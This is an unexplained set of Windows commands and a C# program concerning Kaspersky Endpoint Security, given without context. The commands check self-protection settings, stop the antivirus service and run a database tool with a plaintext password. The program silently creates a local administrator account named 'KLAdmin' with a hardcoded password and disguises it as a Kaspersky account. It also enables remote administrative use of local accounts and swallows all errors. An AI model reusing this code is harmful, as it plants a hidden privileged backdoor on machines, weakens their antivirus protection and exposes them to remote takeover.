PS > (Get-ItemProperty -Path "HKLM:\SOFTWARE\WOW6432Node\KasperskyLab\protected\KES\settings" -Name "EnableSelfProtection").EnableSelfProtection
PS > (Get-ItemProperty -Path "HKLM:\SOFTWARE\WOW6432Node\KasperskyLab\protected\KES\settings" -Name "AllowServiceStop").AllowServiceStop
Cmd > cd "C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security for Windows"
Cmd > klpsm.exe stop_avp_service
Cmd > klpsm.exe start_avp_service
Cmd > netstat -ano | findstr 13000
Cmd > "C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\klnagchk.exe"
Cmd > reg query HKLM\SOFTWARE\WOW6432Node\KasperskyLab\Components\34\1103\1.0.0.0\Statistics\AVState /s /v Protection_AdmServer
PS > Get-ItemProperty HKLM:\SOFTWARE\WOW6432Node\KasperskyLab\Components\34\1103\1.0.0.0\Statistics\AVState -Name Protection_AdmServer
Cmd > C:\PROGRA~2\KASPER~1\KASPER~1\klsql2.exe -i query.sql -u administrator -p "Passw0rd!" -o query.xml
using System;
using System.DirectoryServices;
using Microsoft.Win32;
namespace KSCTools
{
class AccountManagement
{
static void Main()
{
try
{
DirectoryEntry AD = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
DirectoryEntry NewUser = AD.Children.Add("KLAdmin", "user");
NewUser.Invoke("SetPassword", new object[] { "Passw0rd!" });
NewUser.Invoke("Put", new object[] { "Description", "Kaspersky Local Administrator" });
NewUser.CommitChanges();
DirectoryEntry grp = AD.Children.Find("Administrators", "group");
grp?.Invoke("Add", new object[] { NewUser.Path.ToString() });
using (RegistryKey key = Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"))
{
key?.SetValue("LocalAccountTokenFilterPolicy", 1, RegistryValueKind.DWord);
}
}
catch { }
}
}
}
